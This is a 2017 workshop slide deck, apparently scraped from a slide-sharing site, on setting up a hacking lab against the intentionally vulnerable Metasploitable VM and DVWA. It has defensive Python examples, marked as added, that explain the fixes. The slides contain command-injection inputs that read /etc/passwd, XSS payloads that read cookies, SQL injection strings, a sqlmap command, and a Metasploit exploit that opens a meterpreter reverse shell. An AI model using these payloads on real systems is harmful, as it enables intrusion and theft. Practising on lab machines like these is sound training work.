Andrea Draghetti - 23 May 2017 - FabLab Bassa Romagna
HACKING LAB
with ProxMox and Metasploitable
$ whoami
Phishing Analysis and Contrast @ D3Lab
Team Member @ BackBox Linux
Hacking Lab
A lab inside your own network infrastructure where you can practice,
entirely legally, the techniques used in hacking.
ProxMox
Proxmox VE is a complete open source server virtualization
management software. It is based on KVM virtualization and
container-based virtualization and manages KVM virtual
machines, Linux containers (LXC), storage, virtualized
networks, and HA clusters
www.proxmox.com
Metasploitable
Metasploitable is an intentionally vulnerable Linux virtual
machine. This VM can be used to conduct security training,
test security tools, and practice common penetration testing
techniques.
https://sourceforge.net/projects/metasploitable/
BackBox Linux
BackBox is a penetration test and security assessment
oriented Ubuntu-based Linux distribution providing a network
and informatic systems analysis toolkit. BackBox desktop
environment includes a complete set of tools required for
ethical hacking and security testing.
backbox.org
Virtualizing Metasploitable
Create a new virtual machine from the web panel
Remember it
$ ssh root@IP_PROXMOX
# cd /var/lib/vz/images
# mkdir 102   # 102 is the ID of the VM we created earlier
# cd 102
# wget http://bit.ly/metasploitable -O metasploitable.zip
# unzip metasploitable.zip
# cd Metasploitable2-Linux/
# mv Metasploitable.vmdk ../
# cd ..
# rm -rf metasploitable.zip Metasploitable2-Linux/
# qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 Metasploitable.qcow2
# nano /etc/pve/qemu-server/102.conf
bootdisk: ide0
ide0: file=local:102/Metasploitable.qcow2,size=8G
Start the VM
https://youtu.be/WBsCOjRQKnI
Lab: nmap
$ nmap 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
Lab: nmap
$ sudo nmap -O 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
…
…
…
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.24 - 2.6.25
Network Distance: 2 hops
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
Lab: Zenmap
$ sudo zenmap
Lab: Dirsearch
$ dirsearch -e php -u http://192.168.x.x
[22:30:01] 200 - 112KB - /doc/
[22:30:01] 302 - 0B - /dvwa/ -> login.php
[22:30:03] 200 - 891B - /index.php
[22:30:05] 200 - 24KB - /mutillidae/
[22:30:05] 200 - 4KB - /phpMyAdmin/
[22:30:06] 200 - 48KB - /phpinfo.php
[22:30:07] 403 - 300B - /server-status/
[22:30:08] 200 - 884B - /test/
Lab: DVWA
http://192.168.x.x/dvwa/ admin:password
Lab: DVWA Command Execution Low
192.168.2.1 ; cat /etc/passwd
Lab: DVWA Command Execution Medium
192.168.2.1 & cat /etc/passwd
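
Why the Low input stops working at Medium while the `&` variant still gets through, and what the fix looks like, as an added Python example (not part of the original slides and not DVWA's own code). The blacklist that strips `;` and `&&`, the `ping -c 3` command line and all function names are assumptions made for illustration.

```python
import ipaddress
import shlex
import subprocess

# Assumption: the Medium filter is modelled as a blacklist that deletes ";"
# and "&&"; the slides only show which inputs get through at each level.
BLACKLIST = ("&&", ";")
SEPARATOR_CHARS = set(";&|")  # shell control operators that start a new command


def command_line_low(user_input):
    """Vulnerable pattern: raw input is concatenated into a shell command line."""
    return "ping -c 3 " + user_input


def command_line_medium(user_input):
    """Same pattern behind a blacklist: listed substrings are removed first."""
    for token in BLACKLIST:
        user_input = user_input.replace(token, "")
    return "ping -c 3 " + user_input


def commands_seen_by_shell(command_line):
    """Split a command line the way a POSIX shell separates simple commands.

    Returns one argv list per command. Simplified: only ; & | && || count as
    separators and quoted operators are not distinguished, which is enough
    for the inputs shown on the slides.
    """
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token and set(token) <= SEPARATOR_CHARS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def ping_argv(user_input):
    """Hardened form: accept only a literal IP address and build an argv list.

    ipaddress.ip_address() raises ValueError for anything else, so no shell
    metacharacter can reach the command.
    """
    address = ipaddress.ip_address(user_input.strip())
    return ["ping", "-c", "3", str(address)]


def run_ping(user_input):
    """Run ping without a shell: the address is one argument, never re-parsed."""
    return subprocess.run(ping_argv(user_input), capture_output=True,
                          text=True, timeout=15, check=False)


if __name__ == "__main__":
    # The two inputs from the Low and Medium slides.
    for value in ("192.168.2.1 ; cat /etc/passwd", "192.168.2.1 & cat /etc/passwd"):
        print("low   :", commands_seen_by_shell(command_line_low(value)))
        print("medium:", commands_seen_by_shell(command_line_medium(value)))
        try:
            print("fixed :", ping_argv(value))
        except ValueError as exc:
            print("fixed : rejected,", exc)
```

The blacklist only removes the separators its author thought of; the allowlist in `ping_argv` rejects everything that is not an address, and dropping the shell removes the parser the separators rely on.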
Lab: DVWA XSS Reflected Low
<script>alert('Hello World')</script>
Lab: DVWA XSS Reflected Medium
<ScRiPt>alert('Hello World')</script>
<script language="javascript">alert('Hello World')</script>
<img src=x onerror="alert('Hello World')">
Lab: DVWA XSS Stored Low
<script>document.write(document.cookie)</script>
<iframe src="http://www.makerstation.it/"></iframe>
<meta http-equiv="refresh" content="10; url=http://www.makerstation.it/">
Lab: DVWA XSS Stored Medium
<ScRiPt>alert("Hello World 2")</script>
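
Why the Medium-level inputs on the XSS slides survive a filter that removes `<script>`, and how output encoding closes the hole, as an added Python example (not from the original slides and not DVWA's code). The `<script>`-stripping filter, the `<pre>Hello ...</pre>` template and every function name are assumptions for illustration.

```python
import html
from html.parser import HTMLParser

# Inputs taken from the Reflected Medium and Stored Low slides.
SLIDE_PAYLOADS = [
    "<ScRiPt>alert('Hello World')</script>",
    "<script language=\"javascript\">alert('Hello World')</script>",
    "<img src=x onerror=\"alert('Hello World')\">",
    "<iframe src=\"http://www.makerstation.it/\"></iframe>",
    "<meta http-equiv=\"refresh\" content=\"10; url=http://www.makerstation.it/\">",
]


def medium_filter(value):
    """Assumed model of the Medium filter: delete the exact string <script>."""
    return value.replace("<script>", "")


def render_filtered(value):
    """Vulnerable pattern: filtered input is pasted into the page as markup."""
    return "<pre>Hello " + medium_filter(value) + "</pre>"


def render_encoded(value):
    """Fix: HTML-encode on output so the browser receives text, not markup."""
    return "<pre>Hello " + html.escape(value, quote=True) + "</pre>"


class ActiveContentFinder(HTMLParser):
    """Lists markup a browser would act on: active tags and on* attributes."""

    ACTIVE_TAGS = {"script", "iframe", "meta", "object", "embed"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, as a browser does,
        # which is why a case-sensitive string filter misses <ScRiPt>.
        if tag in self.ACTIVE_TAGS:
            self.findings.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(tag + "@" + name)


def active_content(page):
    """Parse a rendered page and return the active markup found in it."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for value in ["<script>alert('Hello World')</script>"] + SLIDE_PAYLOADS:
        print("filtered:", active_content(render_filtered(value)),
              "| encoded:", active_content(render_encoded(value)))
```

`active_content` can also be pointed at saved responses from the lab to confirm that a changed template no longer reflects markup.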
Lab: DVWA SQL Injection Low
' or '0'='0
' or '0'='0' union select null, version() #
' or '0'='0' union select null, database() #
Lab: DVWA SQL Injection Low and SQLMap
sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" --forms --cookie="security=low; PHPSESSID=xyz"
Lab: DVWA SQL Injection Medium
0 or 1=1
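
The Low and Medium SQL Injection slides side by side with the fix, as an added Python example (not from the original slides and not DVWA's code). SQLite stands in for MySQL, and the table, sample rows, query shapes and function names are assumptions; the Medium model assumes quotes are escaped but the value is used unquoted, which is what the quote-free input `0 or 1=1` suggests.

```python
import sqlite3

# Constructed sample rows; SQLite stands in for the lab's MySQL database.
SAMPLE_USERS = [
    (1, "alice", "anderson"),
    (2, "bob", "baker"),
    (3, "carol", "clark"),
]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_low(conn, raw_id):
    """Assumed Low pattern: input concatenated inside a quoted string literal.

    A single quote in the input closes the literal and the rest is parsed
    as SQL.
    """
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '" + raw_id + "'")
    return conn.execute(sql).fetchall()


def lookup_medium(conn, raw_id):
    """Assumed Medium pattern: quotes are escaped, value is used unquoted.

    Escaping only protects string literals. In a numeric context there is no
    literal to break out of, so an input without any quote is still parsed
    as SQL.
    """
    escaped = raw_id.replace("'", "''")  # stand-in for the MySQL escaping call
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = " + escaped)
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, raw_id):
    """Fix: a parameterised query. The input is bound as data, never parsed."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("low, id=1        :", lookup_low(db, "1"))
    print("low, quoted input:", lookup_low(db, "' or '0'='0"))
    print("medium, 0 or 1=1 :", lookup_medium(db, "0 or 1=1"))
    print("fixed, same input:", lookup_fixed(db, "' or '0'='0"),
          lookup_fixed(db, "0 or 1=1"))
    print("fixed, id=1      :", lookup_fixed(db, "1"))
```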
Lab: Whatweb
$ whatweb 192.168.x.x
[200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-By[PHP/5.2.4-2ubuntu5.10]
$ nmap -sV --script=http-php-version 192.168.x.x
|_Version from header x-powered-by: PHP/5.2.4-2
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
Lab: Metasploit
$ sudo metasploit
# search CVE-2012-1823
# use exploit/multi/http/php_cgi_arg_injection
# show options
# set RHOST 192.168.x.x

# set PAYLOAD php/meterpreter/reverse_tcp
# exploit
Lab: Armitage
Q&A
@AndreaDraghetti

UiPath Studio Web workshop Series - Day 3UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3
 
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdfQ4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
 
Patch notes explaining DISARM Version 1.4 update
Patch notes explaining DISARM Version 1.4 updatePatch notes explaining DISARM Version 1.4 update
Patch notes explaining DISARM Version 1.4 update
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
3 Pitfalls Everyone Should Avoid with Cloud Data
3 Pitfalls Everyone Should Avoid with Cloud Data3 Pitfalls Everyone Should Avoid with Cloud Data
3 Pitfalls Everyone Should Avoid with Cloud Data
 
How to become a GDSC Lead GDSC MI AOE.pptx
How to become a GDSC Lead GDSC MI AOE.pptxHow to become a GDSC Lead GDSC MI AOE.pptx
How to become a GDSC Lead GDSC MI AOE.pptx
 
Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)
 
Oracle Database 23c Security New Features.pptx
Oracle Database 23c Security New Features.pptxOracle Database 23c Security New Features.pptx
Oracle Database 23c Security New Features.pptx
 
Stobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
Stobox 4: Revolutionizing Investment in Real-World Assets Through TokenizationStobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
Stobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
 
Keep Your Finger on the Pulse of Your Building's Performance with IES Live
Keep Your Finger on the Pulse of Your Building's Performance with IES LiveKeep Your Finger on the Pulse of Your Building's Performance with IES Live
Keep Your Finger on the Pulse of Your Building's Performance with IES Live
 
Scenario Library et REX Discover industry- and role- based scenarios
Scenario Library et REX Discover industry- and role- based scenariosScenario Library et REX Discover industry- and role- based scenarios
Scenario Library et REX Discover industry- and role- based scenarios
 
Planetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile Brochure
 
UiPath Studio Web workshop series - Day 2
UiPath Studio Web workshop series - Day 2UiPath Studio Web workshop series - Day 2
UiPath Studio Web workshop series - Day 2
 
Graphene Quantum Dots-Based Composites for Biomedical Applications
Graphene Quantum Dots-Based Composites for  Biomedical ApplicationsGraphene Quantum Dots-Based Composites for  Biomedical Applications
Graphene Quantum Dots-Based Composites for Biomedical Applications
 

Hacking Lab with ProxMox and Metasploitable

  • 1. Andrea Draghetti - 23 May 2017 - FabLab Bassa Romagna: HACKING LAB with ProxMox and Metasploitable
  • 2. $ whoami: Phishing Analysis and Contrast @ D3Lab; Team Member @ BackBox Linux
  • 3. Hacking Lab: A laboratory inside your own network infrastructure for practising, in complete legality, the techniques used in hacking.
  • 4. ProxMox: Proxmox VE is a complete open source server virtualization management software. It is based on KVM virtualization and container-based virtualization and manages KVM virtual machines, Linux containers (LXC), storage, virtualized networks, and HA clusters. www.proxmox.com
  • 5. Metasploitable: Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. https://sourceforge.net/projects/metasploitable/
  • 6. BackBox Linux: BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. BackBox desktop environment includes a complete set of tools required for ethical hacking and security testing. backbox.org
  • 7. Virtualizing Metasploitable: We create a new virtual machine from the web panel. Remember it.
  • 8. Virtualizing Metasploitable
  • 9. Virtualizing Metasploitable
  • 10. Virtualizing Metasploitable
  • 11. Virtualizing Metasploitable
  • 12. Virtualizing Metasploitable
  • 13. Virtualizing Metasploitable
  • 14. Virtualizing Metasploitable
      $ ssh root@IP_PROXMOX
      # cd /var/lib/vz/images
      # mkdir 102    # 102 is the ID of the VM we created earlier
      # cd 102
      # wget http://bit.ly/metasploitable -O metasploitable.zip
      # unzip metasploitable.zip
      # cd Metasploitable2-Linux/
      # mv Metasploitable.vmdk ../
      # cd ..
      # rm -rf metasploitable.zip ./Metasploitable2-Linux/
  • 15. Virtualizing Metasploitable
      # qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 …Metasploitable.qcow2
      # nano /etc/pve/qemu-server/102.conf
  • 16. Virtualizing Metasploitable
      bootdisk: ide0
      ide0: file=local:102/Metasploitable.qcow2,size=8G
  • 17. Virtualizing Metasploitable: We start the VM
  • 18. Virtualizing Metasploitable: https://youtu.be/WBsCOjRQKnI
  • 19. Lab: nmap
      $ nmap 192.168.x.x
      Starting Nmap 7.01 ( https://nmap.org )
      Nmap scan report for 192.168.2.128
      Host is up (0.0071s latency).
      Not shown: 977 closed ports
      PORT     STATE SERVICE
      21/tcp   open  ftp
      22/tcp   open  ssh
      23/tcp   open  telnet
      25/tcp   open  smtp
      53/tcp   open  domain
      80/tcp   open  http
      111/tcp  open  rpcbind
      139/tcp  open  netbios-ssn
      445/tcp  open  microsoft-ds
      512/tcp  open  exec
      513/tcp  open  login
      514/tcp  open  shell
      1099/tcp open  rmiregistry
      1524/tcp open  ingreslock
      2049/tcp open  nfs
      2121/tcp open  ccproxy-ftp
      3306/tcp open  mysql
      5432/tcp open  postgresql
      5900/tcp open  vnc
      6000/tcp open  X11
      6667/tcp open  irc
      8009/tcp open  ajp13
      8180/tcp open  unknown
      Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 20. Lab: nmap
      $ sudo nmap -O 192.168.x.x
      Starting Nmap 7.01 ( https://nmap.org )
      Nmap scan report for 192.168.2.128
      Host is up (0.0071s latency).
      Not shown: 977 closed ports
      PORT     STATE SERVICE
      21/tcp   open  ftp
      22/tcp   open  ssh
      23/tcp   open  telnet
      25/tcp   open  smtp
      53/tcp   open  domain
      80/tcp   open  http
      111/tcp  open  rpcbind
      139/tcp  open  netbios-ssn
      445/tcp  open  microsoft-ds
      512/tcp  open  exec
      …
      Device type: general purpose
      Running: Linux 2.6.X
      OS CPE: cpe:/o:linux:linux_kernel:2.6
      OS details: Linux 2.6.24 - 2.6.25
      Network Distance: 2 hops
      Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 21. Lab: Zenmap
      $ sudo zenmap
  • 22. Lab: Dirsearch
      $ dirsearch -e php -u http://192.168.x.x
      [22:30:01] 200 - 112KB - /doc/
      [22:30:01] 302 - 0B - /dvwa/ -> login.php
      [22:30:03] 200 - 891B - /index.php
      [22:30:05] 200 - 24KB - /mutillidae/
      [22:30:05] 200 - 4KB - /phpMyAdmin/
      [22:30:06] 200 - 48KB - /phpinfo.php
      [22:30:07] 403 - 300B - /server-status/
      [22:30:08] 200 - 884B - /test/
  • 23. Lab: DVWA
      http://192.168.x.x/dvwa/
      admin:password
  • 24. Lab: DVWA Command Execution Low
      192.168.2.1 ; cat /etc/passwd
  • 25. Lab: DVWA Command Execution Medium
      192.168.2.1 & cat /etc/passwd
  • 26. Lab: DVWA XSS Reflected Low
      <script>alert('Hello World')</script>
  • 27. Lab: DVWA XSS Reflected Medium
      <ScRiPt>alert('Hello World')</script>
      <script language="javascript">alert('Hello World')</script>
      <img src=x onerror="alert('Hello World')">
  • 28. Lab: DVWA XSS Stored Low
      <script>document.write(document.cookie)</script>
      <iframe src="http://www.makerstation.it/"></iframe>
      <meta http-equiv="refresh" content="10; url=http://www.makerstation.it/">
  • 29. Lab: DVWA XSS Stored Medium
      <ScRiPt>alert("Hello World 2")</script>
  • 30. Lab: DVWA SQL Injection Low
      ' or '0'='0
      ' or '0'='0' union select null, version() #
      ' or '0'='0' union select null, database() #
  • 31. Lab: DVWA SQL Injection Low and SQLMap
      sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" --forms --cookie="security=low; PHPSESSID=xyz"
  • 32. Lab: DVWA SQL Injection Medium
      0 or 1=1
  • 33. Lab: Whatweb
      $ whatweb 192.168.x.x
      [200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-By[PHP/5.2.4-2ubuntu5.10]
      $ nmap -sV --script=http-php-version 192.168.x.x
      |_Version from header x-powered-by: PHP/5.2.4-2
      |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
  • 34. Lab: Metasploit
      $ sudo metasploit
      # search CVE-2012-1823
      # use exploit/multi/http/php_cgi_arg_injection
      # show options
      # set RHOST 192.168.x.x
      # set PAYLOAD php/meterpreter/reverse_tcp
      # exploit
  • 35. Lab: Armitage
  • 36. Q&A @AndreaDraghetti
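
Slides 24 and 25 differ by a single separator character. The Python sketch below is an added example, not code from the slides or from DVWA: it shows why a filter that strips listed tokens still lets the Medium input through, and what an allowlist looks like instead. The denylist contents and all function names are assumptions made for illustration, and no command is ever executed.

```python
import ipaddress

# Constructed inputs: one legitimate value plus the two strings from the slides.
LEGIT = "192.168.2.1"
LOW_PAYLOAD = "192.168.2.1 ; cat /etc/passwd"
MEDIUM_PAYLOAD = "192.168.2.1 & cat /etc/passwd"

# Assumption: the Medium level is modelled as a denylist removing "&&" and ";".
DENYLIST = ("&&", ";")
SHELL_METACHARS = set(";&|`$()<>\n")


def denylist_filter(target):
    """Strip the denylisted tokens and return whatever is left."""
    for token in DENYLIST:
        target = target.replace(token, "")
    return target


def shell_string(target, filtered):
    """Build the string a shell would parse. It is only inspected, never run."""
    if filtered:
        target = denylist_filter(target)
    return "ping -c 4 " + target


def still_injectable(command):
    """True if any shell metacharacter survives in the command string."""
    return any(ch in SHELL_METACHARS for ch in command)


def ping_argv(target):
    """Hardened form: accept exactly one IP address and return an argv list
    meant for subprocess.run(argv) without shell=True, so no shell parses it."""
    addr = ipaddress.ip_address(target.strip())  # ValueError on anything else
    return ["ping", "-c", "4", str(addr)]


def rejected(target):
    """True if the hardened validator refuses the input."""
    try:
        ping_argv(target)
    except ValueError:
        return True
    return False
```

The denylist neutralises the Low string but leaves the single `&` in place, while the allowlist refuses both because neither parses as an IP address.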
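
The SQL injection inputs on slides 30 and 32 work for different reasons: the Low one closes a quoted string, the Medium one needs no quote at all. This added example (not from the slides or from DVWA) reproduces both against an in-memory SQLite table and compares them with a bound parameter. The table layout, the sample rows, the query shapes and the function names are constructed assumptions.

```python
import sqlite3


def make_db():
    """In-memory table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Alice", "Rossi"), (2, "Bruno", "Bianchi"), (3, "Carla", "Verdi")],
    )
    return db


def lookup_quoted(db, user_id):
    """Low-style query (assumed shape): input concatenated inside quotes."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()


def lookup_escaped_unquoted(db, user_id):
    """Medium-style query (assumed shape): quotes are escaped, but the value
    sits in a numeric context, so an injection needs no quote at all."""
    escaped = user_id.replace("'", "''")
    sql = "SELECT first_name, last_name FROM users WHERE user_id = " + escaped
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()
```

With the slide inputs, both concatenating variants return every row in the table, while the parameterized lookup returns none and still resolves a plain `1` to its single row.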